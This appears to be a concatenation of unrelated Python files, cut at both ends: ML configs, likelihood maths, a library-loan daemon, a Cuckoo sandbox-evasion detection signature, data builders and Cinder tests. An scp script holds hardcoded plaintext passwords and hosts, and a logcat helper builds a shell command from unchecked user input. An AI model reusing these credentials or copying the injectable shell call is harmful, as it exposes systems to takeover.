2500, 2400], on_power_thresholds=[20, 20, 20], #, 20, 20], max_input_power=1000, min_on_durations=[60, 60, 60], #, 1800, 1800], window=("2013-06-01", "2014-07-01"), seq_length=1000, output_one_appliance=False, boolean_targets=False, min_off_duration=60, train_buildings=[1], validation_buildings=[1], skip_probability=0, n_seq_per_batch=5 ) net = Net( experiment_name=name, source=source, save_plot_interval=SAVE_PLOT_INTERVAL, loss_function=crossentropy, updates=partial(nesterov_momentum, learning_rate=0.001), layers_config=[ { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(25), 'W': Uniform(25) }, { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(10), 'W': Uniform(10) }, { 'type': LSTMLayer, 'num_units': 50, 'W_in_to_cell': Uniform(5), 'gradient_steps': GRADIENT_STEPS }, { 'type': DenseLayer, 'num_units': source.n_outputs, 'nonlinearity': sigmoid } ] ) return net def init_experiment(experiment): full_exp_name = NAME + experiment func_call = 'exp_{:s}(full_exp_name)'.format(experiment) print("***********************************") print("Preparing", full_exp_name, "...") net = eval(func_call) return net def main(): for experiment in list('bcd'): full_exp_name = NAME + experiment path = os.path.join(PATH, full_exp_name) try: net = init_experiment(experiment) run_experiment(net, path, epochs=5000) except KeyboardInterrupt: break except TrainingError as e: print("EXCEPTION:", e) if __name__ == "__main__": main()
import numpy as np from threeML.plugins.gammaln import logfactorial from math import log def regularized_log(vector): """ A function which is log(vector) where vector > 0, and zero otherwise. :param vector: :return: """ return np.where(vector > 0, np.log(vector), 0) def xlogy(x, y): """ A function which is 0 if x is 0, and x * log(y) otherwise. This is to fix the fact that for a machine 0 * log(inf) is nan, instead of 0. :param x: :param y: :return: """ return np.where(x > 0, x * np.log(y), 0) def poisson_log_likelihood_ideal_bkg(observed_counts, expected_bkg_counts, expected_model_counts): """ Poisson log-likelihood for the case where the background has no uncertainties: L = \sum_{i=0}^{N}~o_i~\log{(m_i + b_i)} - (m_i + b_i) - \log{o_i!} :param observed_counts: :param expected_bkg_counts: :param expected_model_counts: :return: (log_like vector, background vector) """ # Model predicted counts # In this likelihood the background becomes part of the model, which means that # the uncertainty in the background is completely neglected predicted_counts = expected_bkg_counts + expected_model_counts log_likes = observed_counts * np.log(predicted_counts + 1e-100) - predicted_counts - \ logfactorial(observed_counts) return log_likes, expected_bkg_counts def poisson_observed_poisson_background_xs(observed_counts, background_counts, exposure_ratio, expected_model_counts): """ Profile log-likelihood for the case when the observed counts are Poisson distributed, and the background counts are Poisson distributed as well (typical for X-ray analysis with aperture photometry). This has been derived by Keith Arnaud (see the Xspec manual, Wstat statistic) """ # We follow Arnaud et al. (Xspec manual) in the computation, which means that at the end we need to multiply by # (-1) as he computes the -log(L), while we need log(L). Also, he multiplies -log(L) by 2 at the end to make it # converge to chisq^2. We don't do that to keep it a proper (profile) likelihood. # Compute the nuisance background parameter first_term = exposure_ratio * (observed_counts + background_counts) - (1 + exposure_ratio) * expected_model_counts second_term = np.sqrt(first_term ** 2 + 4 * exposure_ratio * (exposure_ratio + 1) * background_counts * expected_model_counts) background_nuisance_parameter = (first_term + second_term) / (2 * exposure_ratio * (exposure_ratio + 1)) first_term = expected_model_counts + (1 + exposure_ratio) * background_nuisance_parameter # we regularize the log so it will not give NaN if expected_model_counts and background_nuisance_parameter are both # zero. For any good model this should also mean observed_counts = 0, btw. second_term = - xlogy(observed_counts, expected_model_counts + exposure_ratio * background_nuisance_parameter) third_term = - xlogy(background_counts, background_nuisance_parameter) ppstat = 2 * (first_term + second_term + third_term) ppstat += 2 * (- observed_counts + xlogy(observed_counts, observed_counts) - background_counts + xlogy(background_counts, background_counts)) # assert np.isfinite(ppstat).all() return ppstat * (-1) def poisson_observed_poisson_background(observed_counts, background_counts, exposure_ratio, expected_model_counts): # TODO: check this with simulations # Just a name change to make writing formulas a little easier alpha = exposure_ratio b = background_counts o = observed_counts M = expected_model_counts # Nuisance parameter for Poisson likelihood # NOTE: B_mle is zero when b is zero! sqr = np.sqrt(4 * (alpha + alpha ** 2) * b * M + ((alpha + 1) * M - alpha * (o + b)) ** 2) B_mle = 1 / (2.0 * alpha * (1+alpha)) * (alpha * (o + b) - (alpha+1) * M + sqr) # Profile likelihood loglike = xlogy(o, alpha*B_mle + M) + xlogy(b, B_mle) - (alpha+1) * B_mle - M - \ logfactorial(b) - logfactorial(o) return loglike, B_mle * alpha def poisson_observed_gaussian_background(observed_counts, background_counts, background_error, expected_model_counts): # This loglike assume Gaussian errors on the background and Poisson uncertainties on the # observed counts. It is a profile likelihood. MB = background_counts + expected_model_counts s2 = background_error ** 2 # type: np.ndarray b = 0.5 * (np.sqrt(MB ** 2 - 2 * s2 * (MB - 2 * observed_counts) + background_error ** 4) + background_counts - expected_model_counts - s2) # type: np.ndarray # Now there are two branches: when the background is 0 we are in the normal situation of a pure # Poisson likelihood, while when the background is not zero we use the profile likelihood # NOTE: bkgErr can be 0 only when also bkgCounts = 0 # Also it is evident from the expression above that when bkgCounts = 0 and bkgErr=0 also b=0 # Let's do the branch with background > 0 first idx = background_counts > 0 log_likes = np.empty_like(expected_model_counts) log_likes[idx] = (-(b[idx] - background_counts[idx]) ** 2 / (2 * s2[idx]) + observed_counts[idx] * np.log(b[idx] + expected_model_counts[idx]) - b[idx] - expected_model_counts[idx] - logfactorial(observed_counts[idx]) - 0.5 * log(2 * np.pi) - np.log(background_error[idx])) # Let's do the other branch nidx = ~idx # the 1e-100 in the log is to avoid zero divisions # This is the Poisson likelihood with no background log_likes[nidx] = xlogy(observed_counts[nidx], expected_model_counts[nidx]) - \ expected_model_counts[nidx] - logfactorial(observed_counts[nidx]) return log_likes, b def half_chi2(y, yerr, expectation): # This is half of a chi2. The reason for the factor of two is that we need this to be the Gaussian likelihood, # so that the delta log-like for an error of say 1 sigma is 0.5 and not 1 like it would be for # the other likelihood functions. This way we can sum it with other likelihood functions. return 1/2.0 * (y-expectation)**2 / yerr**2
import codecs from os import path from setuptools import find_packages from setuptools import setup def read(*parts): filename = path.join(path.dirname(__file__), *parts) with codecs.open(filename, encoding="utf-8") as fp: return fp.read() install_requires = open('requirements.txt').read().split('\n') setup( author="Collabo Software Ltda", author_email="[email protected]", description="Abstraction to logical/soft delete in django models", name="soft-delete", long_description=read("README.md"), long_description_content_type='text/markdown', version="0.2.2", url="https://www.collabo.com.br/", license="MIT", packages=find_packages(exclude=("tests",)), install_requires=install_requires, package_data={ "models": [] }, classifiers=[ "Development Status :: 4 - Beta", "Environment :: Web Environment", "Framework :: Django", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python", "Programming Language :: Python :: 2", "Programming Language :: Python :: 3", "Topic :: Software Development :: Libraries :: Python Modules", ] )
import os import requests from subprocess import Popen, PIPE, CalledProcessError from threading import Timer from framework.logging.logger import Logger from datetime import datetime from blessings import Terminal t = Terminal() class Logcat(object): def __int__(self): super(Logcat, self).__init__() @staticmethod def http_handler(output): """ Handler for submitting logs to the logcat web service """ try: with open("{0}/framework/config".format(os.getcwd()), "r") as config: ip = config.readline() config.close() # Populate POST request # with output from # Logcat # data = {"data": output} # TODO - 07/26/2015 # Remove hardcoded string and add to enums # r = requests.post("http://{0}:5000/services/logcat/update".format(ip.strip("\n")), data=data) if r.text == "Success": print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Success!"))) else: print(t.green("[{0}] ".format(datetime.now()) + t.red("Error! ") + "Check flask.log")) except IOError as e: print(t.red("[{0}] ".format(datetime.now()) + e)) Logger.run_logger(e) except requests.ConnectionError as e: print(t.red("[{0}] ".format(datetime.now()) + e.response)) Logger.run_logger(e.response) return def timeout(self, process): """ Callback to handle process timeouts """ if process.poll() is None: print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Gathering logs ..."))) # Call # http_handler() with output # out = process.communicate() self.http_handler(out) def run_logcat(self): """ Run Logcat with a keyword search that dumps output """ while True: result = raw_input(t.green("[{0}] ".format(datetime.now()) + t.yellow("Would you like to run Logcat? { Y || N } : "))) if result == "N": break elif result == "Y": keyword = raw_input(t.green("[{0}] ".format(datetime.now()) + t.yellow("Enter keyword search : "))) try: p = Popen("adb logcat -d | grep {0}".format(keyword), stdout=PIPE, stderr=PIPE, shell=True) # Create a new Timer() # object and handle process timeouts # with a callback # thread = Timer(3.0, self.timeout, [p]) thread.start() thread.join() except CalledProcessError as e: print(t.red("[{0}] ".format(datetime.now()) + e.returncode)) Logger.run_logger(e.message) except IOError as e: print(t.red("[{0}] ".format(datetime.now()) + e.message)) Logger.run_logger(e.message)
# -*- codeing: utf-8 -*- class Converter(object): def __init__(self): self.factor = {10: "X", 9: "IX", 5: "V", 4: "IV", 1: "I"} def convert(self, n): if n < 1: return "" arabic = sorted(list(filter(lambda e: e <= n, self.factor)))[-1] roman = self.factor.get(arabic) return roman + self.convert(n - arabic) import unittest class RomanNumberTest(unittest.TestCase): def setUp(self): self.converter = Converter() def test_converts_0(self): self.assertEqual("", self.converter.convert(0)) def test_converts_1(self): self.assertEqual("I", self.converter.convert(1)) def test_converts_5(self): self.assertEqual("V", self.converter.convert(5)) def test_converts_2(self): self.assertEqual("II", self.converter.convert(2)) def test_converts_4(self): self.assertEqual("IV", self.converter.convert(4)) def test_converts_10(self): self.assertEqual("X", self.converter.convert(10)) def test_converts_9(self): self.assertEqual("IX", self.converter.convert(9)) def test_converts_29(self): self.assertEqual("XXIX", self.converter.convert(29))
''' usage scphost.py put/get host file1 file2 ''' ## now copy the nightly regression pdf to online ## this is hosted on the astroaips machine import pexpect import sys Folder = False for i in range(len(sys.argv)): if sys.argv[i]=='help': print 'Usage: put/get host path/to/file1 path/to/file2' sys.exit() if sys.argv[i]=='-r': Folder = True file1 = sys.argv[3] file2 = sys.argv[4] hostname = sys.argv[2] if Folder: scp = "scp -r -oPubKeyAuthentication=no" else: scp= "scp -oPubKeyAuthentication=no" if hostname=='iridis': USER = "jm8g08" HOST = "iridis3_c.soton.ac.uk" PASS = "111Neverlose" HOME = "/home/jm8g08/" if hostname=='aips': USER = "jm8g08" HOST = "152.78.192.83" PASS = "11Neverlose" HOME = "/home/jm8g08/" if sys.argv[1]=='put': FILE = file1 REMOTE_FILE = HOME + file2 COMMAND = "%s %s %s@%s:%s" % (scp, FILE, USER, HOST, REMOTE_FILE) if sys.argv[1]=='get': FILE = file2 REMOTE_FILE = HOME + file1 COMMAND = "%s %s@%s:%s %s" % (scp, USER, HOST, REMOTE_FILE, FILE) print COMMAND child = pexpect.spawn(COMMAND) child.expect('password:') child.sendline(PASS) child.expect(pexpect.EOF)
# -*- coding: utf-8 -*- ## ## This file is part of Invenio. ## Copyright (C) 2008, 2009, 2010, 2011 CERN. ## ## Invenio is free software; you can redistribute it and/or ## modify it under the terms of the GNU General Public License as ## published by the Free Software Foundation; either version 2 of the ## License, or (at your option) any later version. ## ## Invenio is distributed in the hope that it will be useful, but ## WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with Invenio; if not, write to the Free Software Foundation, Inc., ## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """ BibCirculation daemon. """ __revision__ = "$Id$" import sys import datetime import time from invenio.dbquery import run_sql from invenio.bibtask import task_init from invenio.mailutils import send_email import invenio.bibcirculation_dblayer as db from invenio.bibcirculation_config import CFG_BIBCIRCULATION_TEMPLATES, \ CFG_BIBCIRCULATION_LIBRARIAN_EMAIL from invenio.search_engine import get_fieldvalues from invenio.bibcirculation_utils import generate_email_body def get_expired_loan(): """ @return all expired loans """ res = run_sql("""select id_crcBORROWER, id, id_bibrec from crcLOAN where status = 'on loan' and due_date < NOW() """) return res def update_expired_loan(loan_id): """ Update status, number of overdue letter and date of overdue letter @param loan_id: identify the loan. Primary key of crcLOAN. @type loan_id: int """ run_sql("""update crcLOAN set overdue_letter_number = overdue_letter_number + 1, status = 'expired', overdue_letter_date = NOW() where id = %s """, (loan_id, )) def get_overdue_letters_info(loan_id): """ Get the number of letters and the date of the last letter sent for a given loan_id. @param loan_id: identify the loan. Primary of crcLOAN. @type loan_id: int @return number_of_letters and date of the last letter """ res = run_sql("""select overdue_letter_number, DATE_FORMAT(overdue_letter_date,'%%Y-%%m-%%d') from crcLOAN where id=%s""", (loan_id, )) return res[0] def send_overdue_letter(borrower_id, subject, content): """ Send an overdue letter @param borrower_id: identify the borrower. Primary key of crcBORROWER. @type borrower_id: int @param subject: subject of the overdue letter @type subject: string """ to_borrower = db.get_borrower_email(borrower_id) send_email(fromaddr=CFG_BIBCIRCULATION_LIBRARIAN_EMAIL, toaddr=to_borrower, subject=subject, content=content, header='', footer='', attempt_times=1, attempt_sleeptime=10 ) return 1 def send_second_recall(date_letters): """ @param date_letters: date of the last letter. @type date_letters: string @return boolean """ today = datetime.date.today() time_tuple = time.strptime(date_letters, "%Y-%m-%d") #datetime.strptime(date_letters, "%Y-%m-%d") doesn't work (only on 2.5). tmp_date = datetime.datetime(*time_tuple[0:3]) + datetime.timedelta(weeks=1) if tmp_date.strftime("%Y-%m-%d") == today.strftime("%Y-%m-%d"): return True else: return False def send_third_recall(date_letters): """ @param date_letters: date of the last letter. @type date_letters: string @return boolean """ today = datetime.date.today() time_tuple = time.strptime(date_letters, "%Y-%m-%d") #datetime.strptime(date_letters, "%Y-%m-%d") doesn't work (only on 2.5). tmp_date = datetime.datetime(*time_tuple[0:3]) + datetime.timedelta(days=3) if tmp_date.strftime("%Y-%m-%d") == today.strftime("%Y-%m-%d"): return True else: return False def task_run_core(): """ run daemon """ #write_message("Getting expired loans ...", verbose=9) expired_loans = get_expired_loan() for (borrower_id, loan_id, recid) in expired_loans: (number_of_letters, date_letters) = get_overdue_letters_info(loan_id) if number_of_letters == 0: content = generate_email_body(CFG_BIBCIRCULATION_TEMPLATES['RECALL1'], loan_id) elif number_of_letters == 1 and send_second_recall(date_letters): content = generate_email_body(CFG_BIBCIRCULATION_TEMPLATES['RECALL2'], loan_id) elif number_of_letters == 2 and send_third_recall(date_letters): content = generate_email_body(CFG_BIBCIRCULATION_TEMPLATES['RECALL3'], loan_id) else: content = generate_email_body(CFG_BIBCIRCULATION_TEMPLATES['RECALL3'], loan_id) title = ''.join(get_fieldvalues(recid, "245__a")) subject = "LOAN RECALL: " + title update_expired_loan(loan_id) #write_message("Updating information about expired loans") send_overdue_letter(borrower_id, subject, content) #write_message("Sending overdue letter") #write_message("Done!!") return 1 def main(): """ main() """ task_init(authorization_action='runbibcirculation', authorization_msg="BibCirculation Task Submission", description="""Examples: %s -u admin """ % (sys.argv[0],), version=__revision__, task_run_fnc = task_run_core) if __name__ == '__main__': main()
# -*- coding: utf-8 -*- # Copyright (C) 2015 Kevin Ross # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from lib.cuckoo.common.abstracts import Signature class Virtualcheck_JS(Signature): name = "virtualcheck_js" description = "执行伪装过的JavaScript检查是否存在沙盒(sandbox)系统或虚拟机(VM)环境" weight = 3 severity = 3 categories = ["exploit_kit", "evasion"] authors = ["Kevin Ross"] minimum = "1.3" evented = True def __init__(self, *args, **kwargs): Signature.__init__(self, *args, **kwargs) filter_categories = set(["browser"]) # backward compat filter_apinames = set(["JsEval", "COleScript_Compile", "COleScript_ParseScriptText"]) def on_call(self, call, process): indicators = [ "vmusbmouse", "vmhgfs", "vboxguest", "vboxmouse", "vmmouse", "vm3dmp", "prl_boot", "prl_fs", "prl_kmdd", "prl_memdev", "prl_mouf", "prl_pv32", "prl_sound", "prl_prl_strg", "prl_tg", "prl_time", "Kaspersky.IeVirtualKeyboardPlugin", "isPhantom", "isNodeJs", "isCouchJs", "isRhino", "isDebugger" ] if call["api"] == "JsEval": buf = self.get_argument(call, "Javascript") else: buf = self.get_argument(call, "Script") for indicator in indicators: if indicator in buf.lower(): return True
from chll import create, merge raw_data = [ 'eNrt0TENACAAA8GOTAQdqEQKAhCJA8JIwp2C5pukJn0FAACAk/nmrOKZ7zQJgIcMCQAAAAAAuLYBWvQCHQ==', 'eNrt0FERABAAQLEXwAkipUBCauF8bBFWzVonAAAAAOCBoQCAj2wFAAAAwDMXioMBcQ==', 'eNrt0DERgDAURMFj6CgQQoWESEHKF4RI2ggIpGBXwN3MS7Inxx1esw1ZKSEBAAB6pwQAdJbSAAAARlg/f2yiA/BDlwQzlQQTPQXRA0M=', 'eNrt2bEJwCAARcEflJTiHM7ukLa2gYAIdyO89iVpyZgBAACqBAAAnzwSAFyqSHCNLgEAwO6VAOAvR/74AgjYAQc=', 'eNrt0DENACAQALFL2BHy2hGJBdhbCa12zQkAAAAAAAAAAACAH0vBuwsy6wDo', 'eNrt2CEBACEABMGjABnQn4ZIBCIkFvsSmImw4sQlqck3AwAA5ygSXKRLgD0CADjHkACAtzUJfvOeAFhTgM0CfdoB2Q==', 'eNrt0sEJgDAQBMBVfAaxjrwsIaWlIIu0Ax+CEMlMBXu7l2RP6hWaCgAAgE+dP8u7dJsB8NqqAgAY0KECAOBJm+HIbYopi28GhnUDcbYCOA==', 'eNrt0bENgDAUQ0GHpEQMkikzEEMyQRpE88XdBNZzkiuZd6CeQwIAgF9pEnxpSLB1SgAAUFOvPX95EAAAAGpotr33ABMZAX0=', 'eNrtyjEBACAQAKFLYBCzfwijWUF3mKlW7QkAAAAAAAAAAAAA/pzXeAFOJAGl', 'eNrt0AENACAQAKGbAQzy2Q1pDecgAtWuOcGHlgIAAAAAAAAAAAB4wgV/DADn', ] for i, r in enumerate(raw_data): raw_data[i] = r.decode('base64').decode('zlib') def do(): counters = [create(r) for r in raw_data] result = merge(counters).cardinality() assert result == 46, result if __name__ == '__main__': do()
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2018 João Pedro Rodrigues # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Splits a PDB file into several, each containing one chain. Usage: python pdb_splitchain.py <pdb file> Example: python pdb_splitchain.py 1CTF.pdb This program is part of the `pdb-tools` suite of utilities and should not be distributed isolatedly. The `pdb-tools` were created to quickly manipulate PDB files using the terminal, and can be used sequentially, with one tool streaming data to another. They are based on old FORTRAN77 code that was taking too much effort to maintain and compile. RIP. """ import os import sys __author__ = "Joao Rodrigues" __email__ = "[email protected]" USAGE = __doc__.format(__author__, __email__) def check_input(args): """Checks whether to read from stdin/file and validates user input/options. """ # Defaults fh = sys.stdin # file handle if not len(args): # Reading from pipe with default option if sys.stdin.isatty(): sys.stderr.write(__doc__) sys.exit(1) elif len(args) == 1: if not os.path.isfile(args[0]): emsg = 'ERROR!! File not found or not readable: \'{}\'\n' sys.stderr.write(emsg.format(args[0])) sys.stderr.write(__doc__) sys.exit(1) fh = open(args[0], 'r') else: # Whatever ... emsg = 'ERROR!! Script takes 1 argument, not \'{}\'\n' sys.stderr.write(emsg.format(len(args))) sys.stderr.write(__doc__) sys.exit(1) return fh def split_chain(fhandle): """Splits the contents of the PDB file into new files, each containing a chain of the original file """ fname_root = fhandle.name[:-4] if fhandle.name != '<stdin>' else 'output' basename = os.path.basename(fname_root) chain_data = {} # {chain_id: lines} prev_chain = None records = ('ATOM', 'HETATM', 'ANISOU', 'TER') for line in fhandle: if line.startswith(records): line_chain = line[21] if line_chain != prev_chain: if line_chain not in chain_data: chain_data[line_chain] = [] prev_chain = line_chain chain_data[line_chain].append(line) for chain_id in sorted(chain_data.keys()): lines = chain_data[chain_id] with open(basename + '_' + chain_id + '.pdb', 'w') as fh: fh.write(''.join(lines)) def main(): # Check Input pdbfh = check_input(sys.argv[1:]) # Do the job split_chain(pdbfh) # last line of the script # We can close it even if it is sys.stdin pdbfh.close() sys.exit(0) if __name__ == '__main__': main()
''' File name: config.py Author: [email protected] Date created: 2015-03-15 12:35:32 Date last modified: 2015-03-15 13:04:20 Python Version: 2.7.6 ''' import os from singleton import singleton import ConfigParser @singleton class Config(): bin_path = './' host = '127.0.0.1' port = 8080 xmpp_server = '127.0.0.1' xmpp_user = '' xmpp_password = '' mysql_host = '' mysql_database = '' mysql_user = '' mysql_pass = '' debug = False log_color = False def load(self, config): if not os.path.isfile(config): print " * Error parsing config: FILE NOT EXIST. Using default config." else: conf = ConfigParser.ConfigParser() conf.read(config) self.host = conf.get('server', 'host') self.port = conf.getint('server', 'port') self.xmpp_server = conf.get('xmpp', 'xmpp_server') self.xmpp_user = conf.get('xmpp', 'xmpp_user') self.xmpp_password = conf.get('xmpp', 'xmpp_password') self.mysql_host = conf.get('mysql', 'mysql_host') self.mysql_database = conf.get('mysql', 'mysql_database') self.mysql_user = conf.get('mysql', 'mysql_user') self.mysql_pass = conf.get('mysql', 'mysql_pass') self.debug = conf.getboolean('extra', 'debug') self.log_color = conf.getboolean('extra', 'log_color') config = Config();
"""Build the tutorial data files from the IMDB *.list.gz files.""" import csv import gzip import os import re from datetime import datetime split_on_tabs = re.compile(b'\t+').split def main(): os.chdir(os.path.dirname(os.path.abspath(__file__))) if not os.path.isdir('../data'): os.makedirs('../data') # Load movie titles. titles = set() uninteresting_titles = set() lines = iter(gzip.open('genres.list.gz')) line = next(lines) while line != b'8: THE GENRES LIST\n': line = next(lines) assert next(lines) == b'==================\n' assert next(lines) == b'\n' print('Reading "genres.list.gz" to find interesting movies') for line in lines: if not_a_real_movie(line): continue fields = split_on_tabs(line.strip(b'\n')) raw_title = fields[0] genre = fields[1] try: raw_title.decode('ascii') except UnicodeDecodeError: continue if genre in (b'Adult', b'Documentary', b'Short'): uninteresting_titles.add(raw_title) else: titles.add(raw_title) interesting_titles = titles - uninteresting_titles del titles del uninteresting_titles print('Found {0} titles'.format(len(interesting_titles))) print('Writing "titles.csv"') with open('../data/titles.csv', 'w') as f: output = csv.writer(f) output.writerow(('title', 'year')) for raw_title in interesting_titles: title_and_year = parse_title(raw_title) output.writerow(title_and_year) print('Finished writing "titles.csv"') print('Reading release dates from "release-dates.list.gz"') lines = iter(gzip.open('release-dates.list.gz')) line = next(lines) while line != b'RELEASE DATES LIST\n': line = next(lines) assert next(lines) == b'==================\n' output = csv.writer(open('../data/release_dates.csv', 'w')) output.writerow(('title', 'year', 'country', 'date')) for line in lines: if not_a_real_movie(line): continue if line.startswith(b'----'): continue fields = split_on_tabs(line.strip(b'\n')) if len(fields) > 2: # ignore "DVD premier" lines and so forth continue raw_title = fields[0] if raw_title not in interesting_titles: continue title, year = parse_title(raw_title) if title is None: continue country, datestr = fields[1].decode('ascii').split(':') try: date = datetime.strptime(datestr, '%d %B %Y').date() except ValueError: continue # incomplete dates like "April 2014" output.writerow((title, year, country, date)) print('Finished writing "release_dates.csv"') output = csv.writer(open('../data/cast.csv', 'w')) output.writerow(('title', 'year', 'name', 'type', 'character', 'n')) for role_type, filename in ( ('actor', 'actors.list.gz'), ('actress', 'actresses.list.gz'), ): print('Reading {0!r}'.format(filename)) lines = iter(gzip.open(filename)) line = next(lines) while (b'Name' not in line) or (b'Titles' not in line): line = next(lines) assert b'----' in next(lines) for line in lines: if line.startswith(b'----------------------'): break line = line.rstrip() if not line: continue fields = split_on_tabs(line.strip(b'\n')) if fields[0]: name = decode_ascii(fields[0]) name = swap_names(name) if not_a_real_movie(fields[1]): continue fields = fields[1].split(b' ') raw_title = fields[0] if raw_title not in interesting_titles: continue if len(fields) < 2: continue if fields[1].startswith(b'('): # uncredited, archive footage, etc del fields[1] if len(fields) < 2: continue if not fields[1].startswith(b'['): continue character = decode_ascii(fields[1].strip(b'[]')) if len(fields) > 2 and fields[2].startswith(b'<'): n = int(fields[2].strip(b'<>')) else: n = '' title, year = parse_title(raw_title) if title is None: continue if character == 'N/A': clist = ['(N/A)'] else: clist = character.split('/') for character in clist: if not character: continue output.writerow((title, year, name, role_type, character, n)) print('Finished writing "cast.csv"') def not_a_real_movie(line): return ( line.startswith(b'"') # TV show or b'{' in line # TV episode or b' (????' in line # Unknown year or b' (TV)' in line # TV Movie or b' (V)' in line # Video or b' (VG)' in line # Video game ) match_title = re.compile(r'^(.*) \((\d+)(/[IVXL]+)?\)$').match def parse_title(raw_title): try: title = raw_title.decode('ascii') except UnicodeDecodeError: return None, None m = match_title(title) title = m.group(1) year = int(m.group(2)) numeral = m.group(3) if numeral is not None: numeral = numeral.strip('/') if numeral != 'I': title = '{0} ({1})'.format(title, numeral) return title, year def swap_names(name): if name.endswith(' (I)'): name = name[:-4] if ',' in name: last, first = name.split(',', 1) name = first.strip() + ' ' + last.strip() return name def decode_ascii(s): return s.decode('ascii', 'replace').replace(u'\ufffd', u'?') if __name__ == '__main__': main()
# Copyright 2014 IBM Corp. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import mock from oslo_serialization import jsonutils import webob from cinder import context from cinder import exception from cinder import test from cinder.tests.api import fakes def app(): # no auth, just let environ['cinder.context'] pass through api = fakes.router.APIRouter() mapper = fakes.urlmap.URLMap() mapper['/v2'] = api return mapper def db_service_get_by_host_and_topic(context, host, topic): """Replacement for db.service_get_by_host_and_topic. We stub the db.service_get_by_host_and_topic method to return something for a specific host, and raise an exception for anything else. We don't use the returned data (the code under test just use the call to check for existence of a host, so the content returned doesn't matter. """ if host == 'host_ok': return {} raise exception.ServiceNotFound(service_id=host) # Some of the tests check that volume types are correctly validated during a # volume manage operation. This data structure represents an existing volume # type. fake_vt = {'id': 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa', 'name': 'good_fakevt'} def vt_get_volume_type_by_name(context, name): """Replacement for cinder.volume.volume_types.get_volume_type_by_name. Overrides cinder.volume.volume_types.get_volume_type_by_name to return the volume type based on inspection of our fake structure, rather than going to the Cinder DB. """ if name == fake_vt['name']: return fake_vt raise exception.VolumeTypeNotFoundByName(volume_type_name=name) def vt_get_volume_type(context, vt_id): """Replacement for cinder.volume.volume_types.get_volume_type. Overrides cinder.volume.volume_types.get_volume_type to return the volume type based on inspection of our fake structure, rather than going to the Cinder DB. """ if vt_id == fake_vt['id']: return fake_vt raise exception.VolumeTypeNotFound(volume_type_id=vt_id) def api_manage(*args, **kwargs): """Replacement for cinder.volume.api.API.manage_existing. Overrides cinder.volume.api.API.manage_existing to return some fake volume data structure, rather than initiating a real volume managing. Note that we don't try to replicate any passed-in information (e.g. name, volume type) in the returned structure. """ vol = { 'status': 'creating', 'display_name': 'fake_name', 'availability_zone': 'nova', 'tenant_id': 'fake', 'created_at': 'DONTCARE', 'id': 'ffffffff-0000-ffff-0000-ffffffffffff', 'volume_type': None, 'snapshot_id': None, 'user_id': 'fake', 'launched_at': 'DONTCARE', 'size': 0, 'attach_status': 'detached', 'volume_type_id': None} return vol @mock.patch('cinder.db.service_get_by_host_and_topic', db_service_get_by_host_and_topic) @mock.patch('cinder.volume.volume_types.get_volume_type_by_name', vt_get_volume_type_by_name) @mock.patch('cinder.volume.volume_types.get_volume_type', vt_get_volume_type) class VolumeManageTest(test.TestCase): """Test cases for cinder/api/contrib/volume_manage.py The API extension adds a POST /os-volume-manage API that is passed a cinder host name, and a driver-specific reference parameter. If everything is passed correctly, then the cinder.volume.api.API.manage_existing method is invoked to manage an existing storage object on the host. In this set of test cases, we are ensuring that the code correctly parses the request structure and raises the correct exceptions when things are not right, and calls down into cinder.volume.api.API.manage_existing with the correct arguments. """ def setUp(self): super(VolumeManageTest, self).setUp() def _get_resp(self, body): """Helper to execute an os-volume-manage API call.""" req = webob.Request.blank('/v2/fake/os-volume-manage') req.method = 'POST' req.headers['Content-Type'] = 'application/json' req.environ['cinder.context'] = context.RequestContext('admin', 'fake', True) req.body = jsonutils.dumps(body) res = req.get_response(app()) return res @mock.patch('cinder.volume.api.API.manage_existing', wraps=api_manage) def test_manage_volume_ok(self, mock_api_manage): """Test successful manage volume execution. Tests for correct operation when valid arguments are passed in the request body. We ensure that cinder.volume.api.API.manage_existing got called with the correct arguments, and that we return the correct HTTP code to the caller. """ body = {'volume': {'host': 'host_ok', 'ref': 'fake_ref'}} res = self._get_resp(body) self.assertEqual(res.status_int, 202, res) # Check that the manage API was called with the correct arguments. self.assertEqual(mock_api_manage.call_count, 1) args = mock_api_manage.call_args[0] self.assertEqual(args[1], body['volume']['host']) self.assertEqual(args[2], body['volume']['ref']) def test_manage_volume_missing_host(self): """Test correct failure when host is not specified.""" body = {'volume': {'ref': 'fake_ref'}} res = self._get_resp(body) self.assertEqual(res.status_int, 400) def test_manage_volume_missing_ref(self): """Test correct failure when the ref is not specified.""" body = {'volume': {'host': 'host_ok'}} res = self._get_resp(body) self.assertEqual(res.status_int, 400) pass @mock.patch('cinder.volume.api.API.manage_existing', api_manage) def test_manage_volume_volume_type_by_uuid(self): """Tests for correct operation when a volume type is specified by ID. We wrap cinder.volume.api.API.manage_existing so that managing is not actually attempted. """ body = {'volume': {'host': 'host_ok', 'ref': 